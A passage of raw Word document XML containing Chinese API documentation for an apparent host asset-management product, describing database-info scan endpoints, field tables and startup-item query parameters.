              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="766E2C34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据库示例名,仅windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58119A3C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B52DCC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24ECB7E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2857EB31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE67B36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>身份验证,仅windows SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22E1BC17" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3656E4E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E9894D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E91C50D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39418D97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>审核级别,仅windows SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69FF4E50" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F976DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sysLogPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25516163" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E11E4C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F82DA58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统日志路径,仅windows SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="02615DE8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="026C45EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mainDbPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EC38066" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D2180BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09544ED8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主数据库路径,仅windows SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C5C51EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc115166125"/>
      <w:bookmarkStart w:id="102" w:name="数据库信息扫描"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数据库信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="2CBF6689" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求数据库信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD6F29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E461E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B44DF05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C6881" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB204B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6BB108" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54733D92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DF6AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BD7FF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE26818"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3EC019E4"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6E5B3C2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AAE0A01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C2C1D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17927FFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A44D98F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4ED1C603" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D20ACDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="299499BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44DAC060" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1712FF1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60A6500F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc115166126"/>
      <w:bookmarkStart w:id="104" w:name="数据库信息查询扫描状态"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r>
        <w:t>数据库信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="675A29A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询数据库信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD2CE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc115166127"/>
      <w:bookmarkStart w:id="106" w:name="启动项信息"/>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>启动项信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="73B0AB6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD6B0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的启动项信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F0FF09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674B4EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>启动项信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464D5B23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE174C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C08052" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107AF17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>启动项信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4F55F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>启动项信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD62C8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>启动项信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157824EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D2356" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用启动项信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B17D87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F294B02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F5096" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc115166128"/>
      <w:bookmarkStart w:id="108" w:name="启动项信息查询结果"/>
      <w:r>
        <w:t>启动项信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="6833618F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询启动项信息，按每台主机每个启动项进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16328757" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EC6A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/service/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399801C2"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413"/>
        <w:gridCol w:w="1415"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="4121"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A245F5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7884A71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="629C9828" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C861ED5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3059A53A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="609A848F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="606B3C96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D00438D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E2C31C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="607E1939" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="798496BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22DC4E86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78BD25B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B5D0925" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B348951" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BA29F69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E976783" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="416AF5DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F670111" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DA0C496" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F61EE40" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38CA4ECB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="443D9ECF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
